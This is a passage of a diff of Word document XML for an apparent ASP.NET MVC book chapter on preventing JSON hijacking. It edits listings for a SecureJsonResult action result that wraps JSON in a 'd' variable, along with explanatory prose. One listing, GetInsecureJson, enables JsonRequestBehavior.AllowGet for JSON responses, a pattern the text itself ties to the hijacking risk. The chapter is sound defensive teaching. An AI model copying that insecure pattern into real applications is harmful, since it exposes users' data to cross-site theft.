-        <w:t>div</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>select</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> id="</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>securepost</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>"/&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">            #3</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> &lt;/div&gt;</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CodeAnnotation"/>
       </w:pPr>
       <w:r>
-        <w:t>#1 A helper function for JSON POST</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeAnnotation"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#2 Our script populates </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>select  options</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeAnnotation"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#3 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>The</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> target select element</w:t>
+        <w:t>#1: Directing JsonResult to allow GETs</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4401,36 +3437,7 @@
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Listing 11.12 uses the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>jQuery</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> JavaScript library to craft a special POST request for our JSON data </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Bold"/>
-        </w:rPr>
-        <w:t>(1)</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.  When the results are returned</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, the function </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Bold"/>
-        </w:rPr>
-        <w:t>(2)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> populates the select list with them.</w:t>
+        <w:t xml:space="preserve">This will allow our action to respond to normal JSON GET requests.  Finally, we can scrap JsonResult itself, instead using an action result to return only non-vulnerable, non-array formatted, JSON. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4438,32 +3445,24 @@
         <w:pStyle w:val="Head3"/>
       </w:pPr>
       <w:r>
-        <w:t>11.3.3.2 Override defaults for GET access</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The problem with this approach is not necessarily technical - it works and it prevents JSON hijacking.  But it's a workaround that is sometimes </w:t>
-      </w:r>
-      <w:r>
-        <w:t>unnecessary</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> and can interfere with systems developed using the REST architectural style.  In those circumstances we have additional options.  First, we can explicitly enable JSON requests from </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>GETs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>by code shown in listing 11.13.</w:t>
+        <w:t xml:space="preserve">11.3.3.3 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Modifying</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> the</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> JSON response</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>The code in listing 11.14 shows a special action result that wraps vulnerable JSON data in a variable "d".</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4471,226 +3470,20 @@
         <w:pStyle w:val="CodeListingCaption"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Listing 11.13 Directing </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>JsonResult</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> to accept </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>GETs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>HttpGet</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>public</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>JsonResult</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>GetInsecureJson</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>object</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> data = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>GetData</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>return</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Json</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">(data, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>JsonRequestBehavior.AllowGet</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>);</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">      #1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeAnnotation"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#1: Directing </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>JsonResult</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> to allow </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>GETs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body1"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">This will allow our action to respond to normal JSON GET requests.  Finally, we can scrap </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>JsonResult</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> itself, instead using an action result to return only non-vulnerable, non-array formatted, JSON. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Head3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">11.3.3.3 </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Modifying</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> the</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> JSON response</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>The code in listing 11.14 shows a special action result that wraps vulnerable JSON data in a variable "d".</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeListingCaption"/>
-      </w:pPr>
-      <w:r>
         <w:t>Listing 11.</w:t>
       </w:r>
-      <w:commentRangeStart w:id="16"/>
+      <w:commentRangeStart w:id="22"/>
+      <w:commentRangeStart w:id="23"/>
       <w:r>
         <w:t xml:space="preserve">14 </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t xml:space="preserve">Creating  a </w:t>
+      </w:r>
       <w:r>
         <w:t>SecureJsonResult</w:t>
       </w:r>
-      <w:commentRangeEnd w:id="16"/>
-      <w:proofErr w:type="spellEnd"/>
+      <w:commentRangeEnd w:id="22"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
@@ -4699,34 +3492,29 @@
           <w:vanish/>
           <w:color w:val="000000"/>
         </w:rPr>
-        <w:commentReference w:id="16"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>public</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> class </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>SecureJsonResult</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> : </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ActionResult</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:commentReference w:id="22"/>
+      </w:r>
+      <w:commentRangeEnd w:id="23"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:commentReference w:id="23"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> action result encapsulates the tricky JSON serialization logic.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>public class SecureJsonResult : ActionResult</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4740,89 +3528,37 @@
       <w:pPr>
         <w:pStyle w:val="Code"/>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>public</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> string </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ContentType</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> { get; set; }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>public</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Encoding </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ContentEncoding</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> { get; set; }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>public</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> object Data { get; set; }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>public</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> override void </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ExecuteResult</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ControllerContext</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> context)</w:t>
+      <w:r>
+        <w:t>public string ContentType { get; set; }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>public Encoding ContentEncoding { get; set; }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>public object Data { get; set; }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>public override void ExecuteResult(ControllerContext context)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4839,14 +3575,7 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>if</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (context == null)</w:t>
+        <w:t>if (context == null)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4867,22 +3596,7 @@
       </w:r>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>throw</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> new </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ArgumentNullException</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>("context");</w:t>
+        <w:t>throw new ArgumentNullException("context");</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4900,54 +3614,20 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>HttpResponseBase</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> response = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>context.HttpContext.Response</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>if</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (!</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>string.IsNullOrEmpty</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ContentType</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>))</w:t>
+        <w:t>HttpResponseBase response = context.HttpContext.Response;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:tab/>
+        <w:t>if (!string.IsNullOrEmpty(ContentType))</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                |#2</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4958,34 +3638,23 @@
         <w:tab/>
         <w:t>{</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>response.ContentType</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ContentType</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>;</w:t>
+      <w:r>
+        <w:t xml:space="preserve">                                                      |#2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>response.ContentType = ContentType;</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">               |#2</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4996,19 +3665,26 @@
         <w:tab/>
         <w:t>}</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>else</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">                                                 |#2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>E</w:t>
+      </w:r>
+      <w:r>
+        <w:t>lse</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                                        |#2</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5018,34 +3694,23 @@
         <w:tab/>
         <w:t>{</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>response.ContentType</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = "application/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>json</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>";</w:t>
+      <w:r>
+        <w:t xml:space="preserve">                                                       |#2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>response.ContentType = "application/json";</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">    |#2</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5063,22 +3728,10 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>if</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ContentEncoding</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> != null)</w:t>
+        <w:t>if (ContentEncoding != null)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                                 |#2</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5099,24 +3752,10 @@
       </w:r>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>response.ContentEncoding</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ContentEncoding</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>;</w:t>
+        <w:t>response.ContentEncoding = ContentEncoding;</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">          |#2</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5134,14 +3773,7 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>if</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (Data != null)</w:t>
+        <w:t>if (Data != null)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5162,43 +3794,19 @@
       </w:r>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> enumerable = Data as </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>IEnumerable</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>if</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (enumerable != null)</w:t>
+        <w:t>var enumerable = Data as IEnumerable;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>if (enumerable != null)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5252,61 +3860,19 @@
       </w:r>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>serializer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = new </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>JavaScriptSerializer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>response.Write</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>serializer.Serialize</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(Data));</w:t>
+        <w:t>var serializer = new JavaScriptSerializer();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>response.Write(serializer.Serialize(Data));</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5338,25 +3904,34 @@
       <w:pPr>
         <w:pStyle w:val="Body1"/>
       </w:pPr>
-      <w:commentRangeStart w:id="17"/>
-      <w:r>
-        <w:t xml:space="preserve">The downside to this approach is that we must use this "d" variable in our JavaScript code.  Listing 11.15 shows consuming </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>jQuery</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="17"/>
+      <w:r>
+        <w:t xml:space="preserve">This action result encapsulates this tricky code </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Bold"/>
+        </w:rPr>
+        <w:t>(2)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to output the proper JSON.  It works well  </w:t>
+      </w:r>
+      <w:commentRangeStart w:id="24"/>
+      <w:commentRangeStart w:id="25"/>
+      <w:r>
+        <w:t>The downside to this approach is that we must use this "d" variable in our JavaScript code.  Listing 11.15 shows consuming jQuery.</w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="24"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
           <w:vanish/>
         </w:rPr>
-        <w:commentReference w:id="17"/>
+        <w:commentReference w:id="24"/>
+      </w:r>
+      <w:commentRangeEnd w:id="25"/>
+      <w:r>
+        <w:commentReference w:id="25"/>
       </w:r>
     </w:p>
     <w:p>
@@ -5366,24 +3941,11 @@
       <w:r>
         <w:t xml:space="preserve">Listing 11.15 </w:t>
       </w:r>
-      <w:commentRangeStart w:id="18"/>
-      <w:r>
-        <w:t xml:space="preserve">Consuming </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>SecureJsonResult</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> with </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>jQuery</w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="18"/>
-      <w:proofErr w:type="spellEnd"/>
+      <w:commentRangeStart w:id="26"/>
+      <w:r>
